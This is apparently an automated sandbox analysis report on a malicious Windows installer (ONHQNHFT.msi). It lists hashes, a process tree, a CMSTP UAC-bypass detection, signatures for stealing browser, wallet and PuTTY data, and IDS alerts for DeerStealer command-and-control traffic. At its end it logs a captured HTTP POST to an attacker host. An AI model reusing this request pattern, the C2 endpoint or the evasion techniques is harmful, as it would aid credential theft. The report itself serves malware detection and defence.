Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ONHQNHFT.msi

Overview

General Information

Sample name:ONHQNHFT.msi
Analysis ID:1565498
MD5:829e5e01899cac6e4326893afbf5be82
SHA1:da638840f3452d74b9118d6c60a5a6cf70b87901
SHA256:84abc28b1da1c2ddf01072fb2817eb446933ba98ecc0db2228281d6fcfadff0c
Tags:msiuser-aachum
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 7552 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\ONHQNHFT.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7588 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • IDRBackup.exe (PID: 7680 cmdline: "C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe" MD5: 371C165E3E3C1A000051B78D7B0E7E79)
      • IDRBackup.exe (PID: 7776 cmdline: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe MD5: 371C165E3E3C1A000051B78D7B0E7E79)
        • cmd.exe (PID: 8044 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • comvalidate_ljv3.exe (PID: 1900 cmdline: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe MD5: 967F4470627F823F4D7981E511C9824F)
  • IDRBackup.exe (PID: 5672 cmdline: "C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe" MD5: 371C165E3E3C1A000051B78D7B0E7E79)
    • cmd.exe (PID: 7692 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • IDRBackup.exe (PID: 5828 cmdline: "C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe" MD5: 371C165E3E3C1A000051B78D7B0E7E79)
    • cmd.exe (PID: 7888 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • comvalidate_ljv3.exe (PID: 7972 cmdline: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe MD5: 967F4470627F823F4D7981E511C9824F)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\toolsync_RO\rtl120.bplJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    C:\Users\user\AppData\Local\Temp\Aplanogamete\rtl120.bplJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000C.00000002.2541651390.00000000030F0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          00000002.00000002.1802356275.0000000003836000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                Click to see the 9 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                12.2.cmd.exe.30f07f8.1.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  12.2.cmd.exe.30f07f8.1.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                  • 0x10f60:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                  • 0x10f28:$s2: Elevation:Administrator!new:
                  2.2.IDRBackup.exe.50000000.7.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    10.2.comvalidate_ljv3.exe.26d86ed.2.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                      10.2.comvalidate_ljv3.exe.26d86ed.2.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                      • 0x25e675:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                      • 0x25e700:$s1: CoGetObject
                      • 0x25e659:$s2: Elevation:Administrator!new:
                      Click to see the 28 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-30T02:25:12.480061+010020283713Unknown Traffic192.168.2.449766172.67.141.133443TCP
                      2024-11-30T02:25:14.994029+010020283713Unknown Traffic192.168.2.449772172.67.141.133443TCP
                      2024-11-30T02:25:17.012217+010020283713Unknown Traffic192.168.2.449777172.67.141.133443TCP
                      2024-11-30T02:25:20.232067+010020283713Unknown Traffic192.168.2.449782172.67.141.133443TCP
                      2024-11-30T02:25:22.751443+010020283713Unknown Traffic192.168.2.449787172.67.141.133443TCP
                      2024-11-30T02:25:24.669971+010020283713Unknown Traffic192.168.2.449792172.67.141.133443TCP
                      2024-11-30T02:25:26.739226+010020283713Unknown Traffic192.168.2.449797172.67.141.133443TCP
                      2024-11-30T02:25:28.673993+010020283713Unknown Traffic192.168.2.449803172.67.141.133443TCP
                      2024-11-30T02:25:31.106397+010020283713Unknown Traffic192.168.2.449809172.67.141.133443TCP
                      2024-11-30T02:25:33.734459+010020283713Unknown Traffic192.168.2.449815172.67.141.133443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-30T02:25:13.319327+010020565501A Network Trojan was detected192.168.2.449766172.67.141.133443TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for submitted file
                      Source: ONHQNHFT.msiReversingLabs: Detection: 13%
                      Source: ONHQNHFT.msiVirustotal: Detection: 12%Perma Link
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\ikltbdkyJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\wqosufscJoe Sandbox ML: detected

                      Exploits

                      barindex
                      Yara detected UAC Bypass using CMSTP
                      Source: Yara matchFile source: 12.2.cmd.exe.30f07f8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.comvalidate_ljv3.exe.26d86ed.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.cmd.exe.49afa00.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.comvalidate_ljv3.exe.262baed.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.cmd.exe.4c48acd.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.cmd.exe.50a76cd.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.cmd.exe.5061a00.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.comvalidate_ljv3.exe.25e6a20.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.cmd.exe.49f56cd.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.comvalidate_ljv3.exe.262c6ed.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.cmd.exe.50a6acd.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.cmd.exe.4c496cd.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.comvalidate_ljv3.exe.26d7aed.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.comvalidate_ljv3.exe.2692a20.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.cmd.exe.49f4acd.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.cmd.exe.4c03a00.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.2541651390.00000000030F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1802356275.0000000003836000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 8044, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: comvalidate_ljv3.exe PID: 1900, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7692, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7888, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: comvalidate_ljv3.exe PID: 7972, type: MEMORYSTR
                      Source: unknownHTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49766 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49772 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49777 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49782 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49787 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49792 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49797 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49803 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49809 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49815 version: TLS 1.2
                      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: comvalidate_ljv3.exe, 0000000A.00000002.2619174284.00000000007F3000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: comvalidate_ljv3.exe, 0000000A.00000002.2626853717.0000000005EE0000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2623026868.00000000046EC000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619374589.0000000002247000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2620951892.00000000038EF000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2623225384.00000000048EA000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2627947736.00000000064E4000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2624804585.00000000054E8000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2625300659.00000000058E0000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2628626053.00000000068E3000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2622021579.0000000003EEA000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2622324566.00000000040E6000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2629272088.0000000006EE0000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2628288211.00000000066E9000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2627346574.00000000060EE000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2625763769.0000000005CE4000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2627613921.00000000062EB000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619991130.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2624105181.0000000004EE6000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2625084870.00000000056E5000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2623508984.0000000004AEC000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2623879071.0000000004CE7000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2624550732.00000000052E5000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2622622578.00000000042EE000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2629082480.0000000006CEF000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2625484846.0000000005AE0000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2621662169.0000000003CEC000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2621456099.0000000003AEC000.00000004.00000001.00020000.00000000.sdmp, comvalidate_
                      Source: Binary string: wntdll.pdbUGP source: IDRBackup.exe, 00000002.00000002.1806069392.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000002.1804905047.0000000003B12000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2286422984.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285768066.000000000460E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2542312095.0000000005580000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541724901.0000000004CB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897539758.0000000005120000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897095781.000000000485A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: comvalidate_ljv3.exe, 0000000A.00000002.2626853717.0000000005EE0000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2623026868.00000000046EC000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619374589.0000000002247000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2620951892.00000000038EF000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2623225384.00000000048EA000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2627947736.00000000064E4000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2624804585.00000000054E8000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2625300659.00000000058E0000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2628626053.00000000068E3000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2622021579.0000000003EEA000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2622324566.00000000040E6000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2629272088.0000000006EE0000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2628288211.00000000066E9000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2627346574.00000000060EE000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2625763769.0000000005CE4000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2627613921.00000000062EB000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619991130.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2624105181.0000000004EE6000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2625084870.00000000056E5000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2623508984.0000000004AEC000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2623879071.0000000004CE7000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2624550732.00000000052E5000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2622622578.00000000042EE000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2629082480.0000000006CEF000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2625484846.0000000005AE0000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2621662169.0000000003CEC000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2621456099.0000000003AEC000.00000004.00000001.00020000.00000000.sdmp, comvalida
                      Source: Binary string: wntdll.pdb source: IDRBackup.exe, 00000002.00000002.1806069392.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000002.1804905047.0000000003B12000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2286422984.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285768066.000000000460E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2542312095.0000000005580000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541724901.0000000004CB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897539758.0000000005120000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897095781.000000000485A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbAcrobatory source: comvalidate_ljv3.exe, 0000000A.00000002.2619174284.00000000007F3000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbAcrobatiner source: comvalidate_ljv3.exe, 0000000A.00000002.2619174284.00000000007F3000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5001C0CC @Sysutils@FindFirst$qqrx20System@UnicodeStringir19Sysutils@TSearchRec,@System@@UStrToPWChar$qqrx20System@UnicodeString,FindFirstFileW,@Sysutils@FindClose$qqrr19Sysutils@TSearchRec,GetLastError,2_2_5001C0CC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000C390 GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,2_2_5000C390
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5001BB34 FindFirstFileW,FindClose,@System@Move$qqrpxvpvi,2_2_5001BB34
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5001BD10 @System@@UStrToPWChar$qqrx20System@UnicodeString,FindFirstFileW,FindClose,2_2_5001BD10
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014000A5E0 GetDlgItem,SendMessageW,SendMessageW,SendMessageW,wsprintfW,GetClientRect,SendMessageW,FindFirstFileW,lstrlenW,SendMessageW,FindNextFileW,FindClose,10_2_000000014000A5E0
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_0000000140007628 FindClose,lstrlenW,lstrcpyW,FindFirstFileW,GetFullPathNameW,FindClose,SetLastError,lstrlenW,10_2_0000000140007628
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014000D848 GetLogicalDriveStringsW,GetDlgItem,GetDriveTypeW,_cwprintf_s_l,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SHGetSpecialFolderPathW,lstrlenW,SHGetSpecialFolderPathW,lstrlenW,SendMessageW,SendMessageW,GetDlgItem,SendMessageW,SendMessageW,GetDlgItem,SendMessageW,RegOpenKeyExW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,SendMessageW,SendMessageW,SendMessageW,RegCloseKey,10_2_000000014000D848
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2056550 - Severity 1 - ET MALWARE Win32/DeerStealer CnC Checkin : 192.168.2.4:49766 -> 172.67.141.133:443
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49766 -> 172.67.141.133:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49777 -> 172.67.141.133:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49782 -> 172.67.141.133:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49792 -> 172.67.141.133:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49772 -> 172.67.141.133:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49803 -> 172.67.141.133:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49815 -> 172.67.141.133:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49787 -> 172.67.141.133:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49797 -> 172.67.141.133:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49809 -> 172.67.141.133:443
                      Source: global trafficHTTP traffic detected: POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15Content-Length: 96Host: gakaroli.online
